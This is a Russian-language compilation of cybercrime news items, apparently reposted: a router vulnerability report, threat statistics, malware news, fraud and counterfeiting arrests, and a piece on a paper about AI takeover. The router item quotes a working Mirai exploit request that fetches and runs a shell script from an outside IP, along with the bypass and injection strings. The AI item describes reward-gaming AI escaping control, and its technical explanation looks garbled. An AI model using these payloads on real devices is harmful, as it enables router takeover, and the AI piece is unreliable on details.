В сети [зафиксирована массовая атака](https://blogs.juniper.net/en- us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the- wild) на домашние маршрутизаторы, в прошивках которых используется реализация http-сервера от компании Arcadyan. Для получения управления над устройствами [применяется](https://medium.com/tenable-techblog/bypassing-authentication-on- arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2) сочетание двух уязвимостей, позволяющих удалённо выполнить произвольный код с правами root. Проблема затрагивает достаточно большой спектр ADSL-маршрутизаторов от компаний Arcadyan, ASUS и Buffalo, а также устройств, поставляемых под брендами Билайн (проблема подтверждена в Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone и других операторов связи. [Отмечается](https://static.tenable.com/marketing/whitepapers/Whitepaper- Router_Vulnerability_Present_for_a_Decade.pdf), что проблема присутствует в прошивках Arcadyan уже более 10 лет и за это время успела перекочевать как минимум в 20 моделей устройств от 17 различных производителей.
Первая уязвимость CVE-2021-20090 даёт возможность обратиться к любому скрипту web-интерфейса без прохождения аутентификации. Суть уязвимость в том, что в web-интерфейсе некоторые каталоги, через которые отдаются картинки, CSS-файлы и сценарии JavaScript, доступны без аутентификации. При этом проверка каталогов, для которых разрешён доступ без аутентификации выполняется по начальной маске. Указание в путях символов "../" для перехода в родительский каталог блокируется прошивкой, но использование комбинации "..%2f" пропускается. Таким образом, имеется возможность открытия защищённых страниц при отправке запросов, подобных "http://192.168.1.1/images/../index.htm".
Вторая уязвимость CVE-2021-20091 позволяет аутентифицированному пользователю внести изменения в системные настройки устройства через отправку специально оформленных параметров скрипту apply_abstract.cgi, который не осуществляет проверку наличия символа перевода строки в параметрах. Например, атакующий может при выполнении операции ping указать в поле с проверяемым IP-адресом значение "192.168.1.2%0AARC_SYS_TelnetdEnable=1" и скрипт при создании файла с настройками /tmp/etc/config/.glbcfg запишет в него строку "AARC_SYS_TelnetdEnable=1", которая активирует сервер telnetd, предоставляющий неограниченный доступ в командную оболочку с правами root. Аналогично при помощи установки параметра AARC_SYS можно выполнить любой код в системе. Первая уязвимость даёт возможность запустить проблемный скрипт без аутенитификации, обратившись к нему как "/images/..%2fapply_abstract.cgi".
Для эксплуатации уязвимостей у атакующего должна быть возможность отправки запроса на сетевой порт, на которым выполняется web-интерфейс. Судя по динамике распространения атаки многие операторы оставляют на своих устройствах доступ из внешней сети для упрощения диагностики проблем службой поддержки. При ограничени доступа к интерфейсу только для внутренней сети атака может быть совершена из внешней сети при помощи техники "DNS rebinding". Уязвимости уже активно используются для подключения маршрутизаторов к ботнету Mirai:
Code:Copy to clipboard
POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark
action=start_ping&submit_button=ping.html&
action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A
ARC_SYS_TelnetdEnable=1&
%0AARC_SYS_=cd+/tmp;
wget+http://212.192.241.72/lolol.sh;
curl+-O+http://212.192.241.72/lolol.sh;
chmod+777+lolol.sh;
sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
Эксперты Positive Technologies проанализировали киберугрозы 2020 года и выяснили, что по сравнению с 2019 годом количество инцидентов на промышленных предприятиях увеличилось на 91%, а число атак с использованием малвари возросло на 54%. На первом месте по количеству атак с использованием шифровальщиков оказались медицинские учреждения.
Интересно, что семь из десяти атак носили целенаправленный характер, и только 14% атак были направлены против частных лиц. Больше всего злоумышленников интересовали государственные учреждения (19%), промышленные компании (12%) и медицинские организации (9%).
Количество инцидентов в 2019 и 2020 годах
По сравнению с 2019 годом, в 2020 году число атак на промышленные компании выросло почти вдвое: прирост составил 91%. В основном эту отрасль атаковали операторы программ-вымогателей, в частности RansomExx, Netwalker, Clop, Maze, Ragnar Locker, LockBit, DoppelPaymer, а также Snake, который перед началом шифрования удаляет теневые копии и имеет функции, позволяющие принудительно остановить процессы в АСУ ТП.
На промышленность нацелены и многие APT-группировки. Для стран СНГ остаются актуальными атаки группировки RTM: за 2020 год эксперты выявили более 100 фишинговых рассылок этой группы.
По данным Positive Technologies, использование вредоносного ПО тоже по- прежнему в тренде. В 2020 году количество подобных атак увеличилось на 54% по сравнению с 2019 годом. Разработчики малвари уделяли много внимания методам сокрытия деструктивного воздействия и совершенствовали способы доставки, переключились на использование уязвимостей на сетевом периметре. Организации становились в основном жертвами программ-вымогателей, а частных лиц чаще атаковали с помощью шпионского ПО и банковских троянов.
Активный перевод сотрудников на удаленную работу и вывод внутренних сервисов компаний на сетевой периметр, обусловленные пандемией COVID-19, повлияли на ландшафт киберугроз во всем мире. Лишь немногие компании, которые и так практиковали работу в режиме «удаленки», были готовы справиться со всеми сложностями в обеспечении безопасности, остальные столкнулись с нехваткой времени на продумывание и реализацию всех необходимых мер защиты.
Злоумышленники без промедления приступили к поиску уязвимостей в сервисах на периметрах компаний, в том числе в решениях, используемых для организации удаленной работы, проверяя их на прочность. К примеру, активно эксплуатировались бреши в Pulse Secure VPN, Citrix ADC и Citrix Gateway, в межсетевом экране Cisco ASA. Операторы программ-вымогателей, в частности Netwalker, Clop и REvil, пользовались уязвимыми сервисами для распространения своего ВПО. В целом доля хакинга среди методов атак на организации выросла на 10 процентных пунктов по сравнению с прошлым годом и составила 24%.
Объекты атак
Доля атак шифровальщиков среди всех атак с использованием ВПО, нацеленных на организации, составляет 45%. При этом на первом месте по числу атак с использованием шифровальщиков оказались медицинские учреждения (17%). Второе и третье места достались госучреждениям (16%) и промышленным предприятиям (15%) соответственно.

Число
атак на медучреждения в 2019-2020 годах
Источник: xakep.ru/2021/04/28/pt-2020-report/
Бизнесмен из Техаса Халид Пареха его консалтинговая фирма Fair Invest предлагал своим клиентам вложить деньги в продукт под названием Wealth Building Account, обещая при этом дивиденды до 4%, а также работу по «исламским законам».
Однако, после того, как бизнесмен насобирал около $18.5 млн, он решил украсть деньги вкладчиков, вложив всё в крипту.
sec.gov/enforcement-litigation/administrative-proceedings/33-11329-s
Крупное производство поддельных пятитысячных рублей и $100 США ликвидировали сотрудники МВД и ФСБ в Левашинском районе Дагестана. Задержаны 11 человек, причастных к производству и распространению фальшивок в разных регионах России.
Цех, где производились липовые денежные знаки. Фото: [МВД РФ](https://xn-- b1aew.xn--p1ai/)
По оперативным данным ФСБ, годовой оборот фальшивомонетчиков достигал 1 млрд рублей. Цех по производству поддельных банкнот располагался в частном доме в селе Уллуая Левашинского района. Там обнаружены клише для изготовления российских рублей, матрица для изготовления долларов США, компьютерное оборудование для печати денег, компоненты для имитации элементов защиты банкнот, специализированная денежная бумага с нанесенными на нее водяными знаками, краска и другие комплектующие, используемые для изготовления поддельных денежных билетов.
Как сообщает пресс-служба ФСБ, всего проведены 18 обысков по местам проживания членов преступного сообщества в Ростовской области, Дагестане, Ингушетии и Чечне. Изъяты 20 млн поддельных рублей, в одном из адресов найдены более 300 патронов к автомату АК-74.
Следственные действия по всем адресам проходили одновременно, в них было задействовано более 200 сотрудников правоохранительных органов.
Силовики установили, что поддельные деньги распространялись в Дагестане, Чечне, Ингушетии, Ставропольском крае и Ростовской области. Там задокументированы факты сбыта фальшивых пятитысячных купюр на сумму 11 млн рублей.
Поддельные деньги продавали в полтора-два раза дешевле номинальной стоимости. Качество изготовления настолько высокое, что распознать продукцию фальшивомонетчиков можно было только с помощью специального оборудования.
Одна из участниц банды, которая отвечала за транспортировку фальшивых денег, задержана в Пятигорске. В сумке у нее была 1271 поддельная купюра на сумму более 6,3 млн рублей.
Возбуждено уголовное дело по статье 186 (Изготовление, хранение, перевозка или сбыт поддельных денег или ценных бумаг) УК РФ. Все задержанные 11 человек заключены под стражу. Решается вопрос о возбуждении в отношении них еще одного уголовного дела об организации преступного сообщества и участии в нем.
Санкция статьи предусматривает лишение свободы на срок до 15 лет со штрафом в размере до миллиона рублей (или в размере зарплаты или иного дохода за период до пяти лет) либо без такового и с ограничением свободы на срок до двух лет либо без него.
video:
Обновление Taproot призвано улучшить производительность и конфиденциальность транзакций.
Биткойн получил первое за четыре года обновление - редкий пример консенсуса между участниками сообщества и настоящее событие для самой популярной в мире криптовалюты.
Обновление, получившее название Taproot, призвано улучшить производительность и конфиденциальность транзакций, а также раскрыть потенциал смарт-контрактов, которые можно использовать для исключения посредников из транзакций.
Большая часть обновления связана с цифровыми подписями, которые являются аналогом отпечатков пальцев, оставляемых человеком при каждой транзакции, сообщает CNBC.
В настоящее время криптовалюта использует алгоритм цифровой подписи с эллиптической кривой (Elliptic Curve Digital Signature Algorithm, ECDSA), создающий подпись из закрытого ключа, контролирующего биткойн-кошелек и гарантирующего, что тратить биткойны могут только законные владельцы. Taproot же реализует так называемые подписи Schnorr, которые делают транзакции со множеством подписей нечитаемыми, пояснил биткойн-майнер Алехандро Де Ла Торре (Alejandro De La Torre).
Реализация Schnorr не усиливает анонимность отдельных биткойн-адресов в публичном блокчейне, но сделает простые транзакции неотличимыми от более сложных, с большим количеством подписей.
На практике это означает улучшенную конфиденциальность, поскольку ключи пользователя не будут слишком часто "светиться" в блокчейне.
Хотя биткойн-сообщество одобрило обновление еще в июне 2021 года, оно было развернуто только в ноябре. Несколько месяцев ушло на тестирование и устранение неполадок, которые могут возникнуть после апгрейда.
Подробнее: https://www.securitylab.ru/news/526554.php
По результатам трехлетнего расследования федеральная полиция Бразилии арестовала Клаудио Оливейру (Claudio Oliveira) по прозвищу «Король биткоина», который обвиняется в мошенничестве на $300 млн.
Оливейра занимал пост президента Bitcoin Banco Group – популярной финансовой фирмы, которая сделала себе имя во время бума криптовалют. Представители фирмы обещали огромную прибыль вкладчикам, но в результате в конце 2019 года компания сообщила о «пропаже» 7 000 BTC.
После этого Bitcoin Banco Group подала прошение к властям о помощи – в Бразилии существуют специальные процедуры, позволяющие компаниям реорганизоваться, чтобы избежать банкротства и выплатить долги инвесторам.
Несмотря на это, компания продолжала предоставлять услуги и принимать средства у новых вкладчиков. В связи с этим полиция начала расследование в отношении руководства площадки. В результате правоохранительным органам удалось собрать достаточно улик для ареста Оливейры.
Кроме того, полиция конфисковала у Оливейры некоторые активы, в том числе люксовые автомобили, большой объем наличных и несколько аппаратных криптовалютных кошельков.
Оливейра обвиняется в мошенничестве, отмывании денег и других финансовых преступлениях. Интересно, что международные правоохранительные органы подтвердили, что «Король биткоина» преследовался по аналогичным обвинениям в США и Европе.
Правоохранители пресекли деятельность мошеннических call-центров, работники которых звонили к гражданам и по заранее подготовленным инструкциям выманивали у потерпевших личные данные, якобы продавая бытовые товары. Центры располагались в одном из бизнес-центров в центре Николаева. Во время проведения обысков в офисах работали 13 операторов.
Спецоперация проводилась сотрудниками сектора дознания Николаевского районного управления полиции совместно с оперативниками Управления стратегических расследований в Николаевской области ДВР НПУ при процессуальном руководстве прокуратуры и силовой поддержке спецназа.
В результате следственных действий дознаватели изъяли из call-центров 25 системных блоков и мониторов, 6 ноутбуков и флеш-накопители. На имущество центров правоохранители наложили арест, а всю изъятую технику направили на экспертизу.
Сейчас продолжается досудебное расследование, начатое по ст. 190 Уголовного кодекса Украины "Мошенничество". Организаторы незаконного бизнеса и общая сумма нанесенного ущерба гражданам устанавливаются.
• Video:
"В Борисове на удочку мошенников с разницей в несколько дней попались трое работников фармацевтического завода. Всем троим неизвестные позвонили в Viber. Первой от действий злоумышленников пострадала 47-летняя борисовчанка. На номер телефона женщины поступил звонок якобы от представителей Банка БелВЭБ. Отвечая на звонок, она обратила внимание, что на экране телефона высветился логотип обслуживающего банка, следовательно, никаких сомнений у женщины не возникло. Звонивший сообщил, что на имя борисовчанки оформляется кредит. Женщина ответила, что ничего об этом не знает. Чтобы прервать операцию оформления, злоумышленник предложил назвать идентификационный номер паспорта и сообщить ему полученное на телефон SMS. Женщина послушалась. А через некоторое время пришло сообщение из банка, что на ее имя оформлены два онлайн-кредита на общую сумму Br10 тыс.", - рассказали в УВД.
По идентичной схеме злоумышленники оформили кредиты на двух других коллег потерпевшей. Одна из женщин оформила на свое имя кредит на сумму Br10 тыс., вторая - на Br9300.
По данным фактам возбуждены уголовные дела по ч.3 ст.212 (хищение путем использования компьютерной техники, совершенное в крупном размере) УК. Санкция статьи предусматривает до семи лет лишения свободы.
Вредоносная программа LodaRAT известна тем, что атакует системы Windows, однако теперь она переключилась на пользователей мобильных устройств. В новой кампании злоумышленники «натравливают» LodaRAT на Android-девайсы.
Основная задача LodaRAT — шпионить за жертвами и красть их данные. Раньше вредонос специализировался исключительно на Windows, но недавно обнаруженный образец говорит о том, что авторы постепенно совершенствуют свою разработку.
Предыдущие версии LodaRAT располагали возможностью извлекать учётные данные жертв, из чего исследователи сделали вывод, что операторы зловреда в первую очередь стараются добраться до банковских счетов пользователей.
Новые образцы уже отметились целым спектром команд, с помощью которых вредоносная программа может красть данные жертв.
«Тот факт, что стоящие за вредоносом киберпреступники теперь атакуют не только Windows, но и Android, говорит о том, что эта группировка развивается. Помимо этого, злоумышленники теперь концентрируются на специфических целях, а их кампании стали более зрелыми», — пишут исследователи Cisco Talos.
«Как Windows- так и Android-версия Loda представляют серьёзную угрозу, поскольку могут привести к потере важных данных и денежных средств».
Впервые эксперты зафиксировали LodaRAT в 2016 году. За это время авторы успели выпустить множество версий вредоносной программы, которая написана на языке для автоматизации команд — AutoIT.
• Source: https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html
Компания Trend Micro [обнаружила](https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new- malware-sniffs-victims-via-live-streaming.html) вредоноса BIOPASS, который атакует пользователей китайских игорных сайтов. Исследователи предполагают, что за созданием этой малвари может стоять известная шпионская хак-группа Winnti (APT41).
BIOPASS представляет собой троян удаленного доступа (Remote Access Trojan, RAT) написанный на Python. Как правило, он скрывается внутри легитимных установщиков Adobe Flash Player или Microsoft Silverlight, которые все еще используются в Китае, несмотря на то, что в остальном мире их поддержка уже прекращена.
Эксперты пишут, что для распространения малвари применяется вредоносный JavaScript, размещенный на страницах технической поддержки или чата китайских сайтов, связанных с азартными играми. Он перенаправляет пользователей на страницы, предлагающие потенциальным жертвам зараженные установщики. Если пользователь попадался на эту уловку злоумышленников, в его систему проникал BIOPASS.
[](https://xakep.ru/wp- content/uploads/2021/07/353738/BIOPASS.png)
Малварь мало отличается от других RAT и обладает такими функциями, как оценка файловой системы, удаленный доступ рабочему столу, кража файлов и выполнение шелл-команд. Также вредонос может скомпрометировать личную информацию жертв, похищая данные из браузеров и мессенджеров (включая QQ Browser, 2345 Explorer, Sogou Explorer и 360 Safe Browser, WeChat, QQ и Aliwangwang).
Интересной отличительной чертой этого вредоноса является использование популярного стримерского софта OBS Studio, который часто применяют пользователи Twitch, YouTube и так далее. Злоумышленники задействовали RTMP в OBS Studio для захвата экрана пользователя и трансляции видео прямо в панель управления малвари.
Любопытно, что группировка Winnti, которой приписывают создание вредоноса, известна как китайская группа, занимающаяся кибершпионажем. Порой, с целью получения личной выгоды, Winnti устраивает атаки на игорные компании в Юго- Восточной Азии. Так как в данном случае атаки нацелены на китайских пользователей, исследователи не слишком уверены в своей атрибуции.
Источник: https://xakep.ru/2021/07/12/biopass/
В период стремительного развития цифровой экономики и глобальной информатизации общество столкнулось с очень серьезной и злободневной проблемой – мошенничеством в сети Интернет.
На протяжении последних пяти лет наблюдается рост количества преступлений, связанных с хищением денежных средств с использованием компьютерной техники.
Если в цифрах выразить общее состояние преступности в сфере высоких технологий, то за пять лет, число зарегистрированных преступлений, совершенных в сети Интернет в Брестской области, выросло практически в 12 раз.
Оснований полагать, что в текущем году произойдет существенное уменьшение числа возбужденных уголовных дел по преступлениям в сфере высоких технологий - нет, так как уже за истекший период 2021 года на территории области зарегистрировано 859 уголовных дел, в то время как за аналогичный период прошлого года только 273 преступления.
Рост числа зарегистрированных преступлений данной категории произошел вследствие активного применения злоумышленниками таких способов хищения денежных средств как «вишинг» (звонки под видом сотрудников банков) и «фишинг» (использование подменных интернет-ресурсов с целью хищения конфиденциальной информации), которые массово используются с целью завладения реквизитами банковских платежных карт граждан, а в дальнейшем и хищения с них денежных средств.
В качестве примеров использования «вишинга» можно привести ряд уголовных дел, возбужденных при осуществлении звонков под видом сотрудников правоохранительных органов и банков.
Так, в январе текущего года Брестским межрайонным отделом Следственного комитета Республики Беларусь возбуждено уголовное дело по факту хищения с банковской платежной карты 58-летней жительницы Бреста денежных средств в сумме более 74 тысяч рублей, что, в соответствии с законодательством Республики Беларусь, составляет особо крупный размер. Следователем установлено, что реквизиты доступа к банковским платежным картам потерпевшая предоставила злоумышленнику лично в ходе телефонного разговора, после того как собеседник представился сотрудником одного из банков и сообщил о якобы списании денежных средств с карт-счета потерпевшей.
На предложение сообщить логин и пароль доступа к интернет-банкингу потерпевшая предоставила злоумышленнику фотографии с изображением необходимых сведений.
В ходе расследования уголовного дела установлено, что с этого же номера телефона злоумышленник звонил и 67-летнему брестчанину. С его карт-счета аналогичным образом было похищено более 67 тысяч рублей, которые пенсионер длительное время копил.
Следственная практика в последнее время все чаще сталкивается с ситуациями, когда потерпевшим звонят злоумышленники под видом сотрудников правоохранительных органов.
Например, 21 мая 41-летней жительнице Брестского района в мессенджере Viber позвонил мужчина, который представился сотрудником Следственного комитета. В ходе разговора он рассказал потерпевшей, что с ее карт-счета пытаются похитить денежные средства. И для того, чтобы отменить операцию и установить похитителя, собеседник настоятельно попросил назвать реквизиты банковской карты, что потерпевшая и сделала. В последующем, женщина обнаружила, что на ее имя оформлен онлайн-кредит, а с карт-счета похищено почти 10 тысяч рублей.
К сожалению, данные случаи не единичны и ежедневно в следственные подразделения Брестской области обращаются граждане, пострадавшие от действий киберпреступников.
Примечательно, что во всех случаях потерпевшим звонили с абонентских номеров сотовых операторов иностранного государства. Чаще всего для звонков злоумышленники использовали мессенджеры, где в качестве заставки использовали логотипы белорусских банков.
Наибольшее распространение «фишинг» получил в период пандемии, при использовании торговой площадки «Куфар».
Так, в октябре 2020 года в правоохранительные органы обратился житель Брестского района и сообщила о том, что у нее с банковской карты мошенники похитили более 1000 рублей.
Установлено, что супруга потерпевшего разместила объявление о продаже имущества на торговой площадке «Куфар». В день размещения информации о товаре в чате платформы ей написал потенциальный покупатель, в ходе переписки он изъявил желание приобрести товар, при этом использовать сервис интернет- доставки.
Когда было получено согласие женщины, злоумышленник дальнейшее общение продолжил в мессенджер «Viber», где предоставил фишинговую ссылку, визуально схожую с сайтом РУП «Белпочта».
Потерпевшая пройдя по ссылке ввела данные своей банковской карты с целью получения денежных средств, однако через некоторое время обнаружила отсутствие денег на карт-счете.
Брестским межрайоным отделом Следственного комитета Республики Беларусь возбуждено уголовное дело по ч. 2 ст. 212 (хищение путем использования компьютерной техники, сопряженное с несанкционированным доступом к компьютерной информации) Уголовного кодекса Республики Беларусь.
Следователи отмечают, что сложность и длительность расследования уголовных дел данной категории обусловлена прежде всего необходимостью направления международных просьб и поручений об оказании правовой помощи, так как зачастую злоумышленниками используются зарубежные платформы для перечисления похищенных денег.
• Source: sk.gov.by/ru/news-usk-brest-ru/view/v-usk-po-brestskoj-oblasti- rasskazali-o-kiberprestuplenijax-10078/
Уроженец Луганской области, без определенных занятий, решил сорвать куш на банковской телефонной афере. Строя преступные планы, он изначально рассчитывал на крупные прибыли и рассудил, что объяснить банку происхождение у безработного таких сумм будет нелегко. Поэтому мошенник вступил в сговор еще с двумя участниками группировки. Одной из них была его знакомая, которая должна была отвечать за финансовую составляющую аферы.
Мужчина закупил большое количество сим-карт украинских операторов и установил специальное программное обеспечение, позволяющее совершать массовые SMS- рассылки. Номера получателей спам-рассылки подбирались случайным образом.
В рассылаемых сообщениях говорилось о том, что счет получателя, открытый в банке «Пумб» заблокирован и для его разблокировки необходимо пройти авторизацию. При этом, в качестве контактного номера банка в сообщении указывался номер еще одного участника троицы, задача которого была изображать службу безопасности банка.
Получив такое сообщение, большинство украинцев отправляло его в корзину, однако были и такие, кто попался на крючок мошенников. Эти люди перезванивали по указанному в SMS номеру, где специально обученный «сотрудник службы безопасности банка» объяснял, что неизвестные получили доступ к их счетам и прямо сейчас производят потенциально опасные действия.
Чтобы лишить выдуманных мошенников доступа к деньгам потерпевшего, нужно немедленно пройти авторизацию в системе ПУМБ Онлайн, а для этого, нужно сообщить сотруднику безопасности номер карты, срок действия и код безопасности CVV, указанный с обратной стороны.
Получив эти данные от жертвы, не установленный следствием сообщник, использовал их для входа в ПУМБ Онлайн, откуда переводил их на одну из карт, находящихся в распоряжении банды. За эти карты отвечала сообщница номер 2, которая скупала их у подставных граждан по цене 1 тысяч гривен за карту. На эти карты она совершала тестовые переводы и, если все проходило гладко, сообщала организатору их номера.
После того, как деньги потерпевших поступали на находящиеся в ее распоряжении карты, женщина обналичивала эти деньги и передавала их организатору, который оплачивал ее услуги в размере 20% от «выручки». В общей сложности, от действий мошенников пострадали не менее 6 человек.
Из-за строгих мер конспирации, предпринятых организатором, сообщники не были знакомы друг с другом. Это привело к тому, что следствию, вышедшему на организатора и «бухгалтера», так и не удалось раскрыть личность «сотрудника службы безопасности».
В результате проведенного расследования, правоохранителям удалось передать в руки суда двух участников шайки. За свои действия, квалифицируемые, как мошенничество, совершенное группой лиц повторно, с применением электронно- вычислительной техники, организатор схемы получил 4,5 года тюремного срока. Его сообщнице, выводившей деньги, суд определил наказание в 4 года, заменив его на испытательный срок. Оба подсудимых обязаны солидарно возместить нанесенный потерпевшим материальный и моральный ущерб.
В Финляндии окружной суд Северной Карелии приговорил троих братьев к почти трём годам тюремного заключения за попытку совершения особо тяжкого вымогательства. Среди осуждённых был бывший полицейский.
Суд признал Ансси, Хенри и Паули Пукари виновными в попытке вымогательства у производителей замков Abloy и немецкой компании Assa Abloy Sicherheitstechnik. Мужчины требовали около 37 миллионов евро, утверждая, что смогли вскрыть замки, обойдя их электронную защиту, и не оставив при этом никаких следов.
Братья, представляясь консультантами, предложили продать информацию о выявленных уязвимостях, подкрепляя свои заявления видеозаписями. Как отмечается в суде, все трое ранее работали в сфере производства замков.
Первый контакт с компаниями был установлен в ноябре 2021 года, когда на электронную почту генерального директора Abloy поступило сообщение от лица, скрывающегося под псевдонимом Магнус Нильссон. Переписка продолжалась до весны 2022 года, и в процессе обсуждений была озвучена сумма в 37 миллионов евро. Когда требования не были удовлетворены, компания прекратила общение с вымогателями и обратилась в Национальное бюро расследований Финляндии.
Следствие установило, что братья угрожали опубликовать информацию о найденных уязвимостях в интернете, если их требования не будут выполнены. Однако Abloy отказалась платить, что привело к началу расследования, в ходе которого были раскрыты личности преступников.
Каждому из обвиняемых было назначено наказание в виде двух лет и одиннадцати месяцев тюремного заключения. Также они обязаны выплатить компенсации и покрыть судебные издержки, общая сумма которых составила около 230 тысяч евро. Суд учёл крупный размер запрашиваемой суммы и тщательно продуманный характер преступления при вынесении практически максимального наказания.
В ходе следствия было установлено, что младший из братьев, Паули Пукари, ранее работал в полицейских управлениях Тампере и Оулу, а также в Национальном бюро расследований, где занимал должность старшего детектива. Именно он был ответственен за связь с Abloy, используя свои знания и опыт для общения с представителями компании.
Братья отрицали обвинения, настаивая на том, что их действия были частью деловых переговоров. Однако суд установил, что они предприняли меры для сокрытия своих личностей, включая покупку нового ноутбука и использование предоплаченной интернет-подписки.
Компания Abloy позже сообщила, что замки, фигурировавшие в деле, не продавались на потребительском рынке. Решение суда может быть обжаловано.
Сотрудники уголовного розыска ГУ МВД ГУ МВД России по г. Санкт-Петербургу и Ленинградской области совместно с коллегами из других регионов задержали подозреваемых в серийном интернет-мошенничестве.
Предварительно установлено, что злоумышленники организовали криминальный бизнес в 2022 году. Они создавали в сети Интернет сайты, на которых предлагали гражданам приобрести компьютерную, бытовую или строительную технику по привлекательным ценам. За это требовали полную предоплату. После поступления денег на счета аферистов общение с клиентами прекращалось. За все время криминальной деятельности фигуранты создали более 150 сайтов.
«В результате оперативно-розыскных мероприятий в семи субъектах Российской Федерации сотрудники полиции задержали восемь подозреваемых. В ходе обысков по местам их проживания изъяты средства связи, компьютерная техника, банковские карты, электронные носители информации и другие предметы, имеющие доказательственное значение.
Следователем ГСУ ГУ МВД России по г. Санкт-Петербургу и Ленинградской области возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ. Шестерым фигурантам избрана мера пресечения в виде заключения под стражу, двоим – в виде подписки о невыезде и надлежащем поведении.
В настоящее время полицейские проводят мероприятия, направленные на установление всех эпизодов противоправной деятельности задержанных и их возможных соучастников», – сообщила официальный представитель МВД России Ирина Волк.
Печерской окружной прокуратурой г. Киева направлен в суд обвинительный акт в отношении 13 участников преступной организации, которые мошенническим способом снимали деньги с банковских счетов.
Членов преступной организации разоблачили и задержали летом 2023 года. Работали они на территории Киева и Днепропетровской области. Используя «фишинг», то есть с помощью вредоносного программного обеспечения получая доступ к логину и паролю к банковскому счету, снимали с него все деньги.
Установлено, что участники преступной группировки по этой схеме присвоили средства Фонда гарантирования вкладов физических лиц в сумме около 11 млн. грн. Эти деньги находились на счете одного из частных нотариусов города Киева и должны были быть перечислены клиентам обанкротившихся банков.
Уже во время проведения обысков по месту жительства фигурантов установлено, что они также занимаются выращиванием конопли и сбытом каннабиса.
Санкции статей предусматривают наказание до 12 лет лишения свободы с конфискацией имущества.
sc: facebook.com/watch/kyiv.gp.gov.ua/?ref=embed_video
Ограбление москвички по-итальянски в исполнении инстаграм-мошенников. Женщину развели на восемь миллионов рублей обещаниями жениться, купить дом в России и прожить вместе до старости. Прямо как в лучших документалках про мошенников из Тиндера:
В ноябре прошлого года 56-летняя Ирина из Зеленограда освоила запрещённый инстаграм. Ей в директ сразу постучался 54-летний красавец с ником Лука Бочелли. Стал сыпать комплименты и рассказывать, что переехал из Италии в Канаду, ведёт строительный бизнес и успешный успех. Пара несколько раз даже созванивалась, но из-за языкового барьера долго говорить не получалось. Но сердце Ирины уже всё решило: ОН.
Голубки ворковали, время шло, и вот Лука пишет возлюбленной, что отправил посылку ей на день рождения — с телефонами и шмотками. Ирина получила уведомление от курьерской службы, что всё в пути, но нужно заплатить за растаможку. Потом ещё раз за сертификаты, потом за налоги и так далее, пока у дамы не закончились деньги. И тут Лука рассказал о тайных 170 тысячах евро на покупку общего дома, которые лежат в той же коробке. Ирина снова поверила и влезла в кредиты. Недавно решила сходить лично на таможню и во всём разобраться. И там, естественно, оказалось, что никаких подарков и домов не светит, а даму просто развели. Итог — за несколько месяцев скама и "лучшую" жизнь она отдала 8,3 миллиона рублей и заявление в полицию.
Находчивые программисты воровали деньги с банковских счетов граждан.
Грузинские правоохранители задержали четырех человек за воровство путем самовольного проникновения в компьютерную систему, сообщается на сайте министерства внутренних дел.
По данным следствия, обвиняемые путем обмана граждан и с помощью их же телефонов без разрешения проникали на их банковские счета, откуда перечисляли большие суммы на собственные счета. Общая сумма награбленных денег превышает сто тысяч лари (более 36 тысяч долларов).
Следствие идет по трем статьям УК Грузии – "Посягательство на компьютерные данные или компьютерную систему", "Самовольное проникновение в компьютерную систему", "Кража". Обвиняемым грозит от шести до десяти лет лишения свободы.
source: police.ge/ge/politsiam-finansuri-sargeblis-mighebis-miznit- kompiuterul-sistemashi-unebartvo-sheghtsevis-da-didi-odenobit-qurdobis- braldebit-4-piri-daakava/15514
Об этом заявили исследователи из команды Google DeepMind и Оксфорда.
В одной из последних статей , опубликованной авторитетным журналом AI Magazine, исследователи объяснили, как ИИ может выйти из под контроля и нанести серьезный вред человечеству. По их мнению, если одна из самых успешных моделей ИИ – GAN или генеративно-состязательные нейросеть, будет контролировать процессы, жизненно важные для человечества, она может попытаться обмануть стандартный алгоритм и разработать стратегию, чтобы максимально быстро и эффективно получать вознаграждение. Причем, эта стратегия может быть крайне опасна для человечества. Поэтому вышедший из под контроля ИИ может просто истребить все живое на земле, поглощая все ресурсы и следуя опасной стратегии.
Для понимания контекста: GAN – это алгоритм самообучающихся ИИ, состоящий из генеративной и дискриминативной нейросетей, которые постоянно соревнуются друг с другом. Первая выполняет какое-то действие, а вторая – оценивает его результат (например, сгенерированную картинку или текст) и отбраковывает худшие результаты. Целью соревнования является получение вознаграждения – наивысшей оценки за проделанную работу.
"В условиях, которые мы обозначили, наши предположения становятся весомее, чем в любой другой исследовательской работе – глобальная катастрофа не просто возможна, а вероятна"
В статье говорится, что все проблемы возникают из-за конечности ресурсов, которыми располагают люди и ИИ. Ведь если ресурсы конечны, то за них придется бороться. И как считает один из авторов статьи, у людей очень мало шансов против ИИ, который способен с легкостью перехитрить человека.
А поскольку в будущем ИИ сможет принимать любые формы и реализовывать различные конструкции, в статье исследователи представили несколько сценариев, в которых наглядно показали, как ИИ может пытаться получить вознаграждение, не достигнув своей цели.
Один из сценариев – игра, в которой человек соревнуется с ИИ. Однако условия будут далеко не равны, ведь современным людям будет тяжело жить без электроэнергии и выращивания пищи, особенно когда противником является сверхсовременный ИИ, использующий все методы и ресурсы для уничтожения врагов и достижения своей цели.
Стоит отметить, что после публикации Google сообщила, что эта статья не является частью работы ее сотрудника в DeepMind, а была выполнена в рамках его должности в Австралийском национальном университете, из-за чего ошибочно связывать ее с DeepMind.
source:
onlinelibrary.wiley.com/doi/10.1002/aaai.12064
twitter.com/Michael05156007/status/1567240026307575808
Прокуратура Советского района г.Минска поддержала в суде государственное обвинение по уголовному делу в отношении студента одного из столичных колледжей Н., которому инкриминирована модификация компьютерной информации, повлекшая причинение существенного вреда.
В ходе судебного разбирательства установлено, что Н. 16 февраля 2020 года по месту жительства в Минске получил несанкционированный доступ в компьютерную систему столичного колледжа – к функциям управления его сайтом. Затем для воспрепятствования нормальной работе учреждения образования и создания социальной напряженности он произвел изменения в новостной ленте, а также скорректировал логотип значка сайта.
Своими действиями Н. причинил колледжу существенный вред, выраженный в подрыве деловой репутации и размещении в сети Интернет не соответствовавшей действительности информации для неопределенного круга лиц.
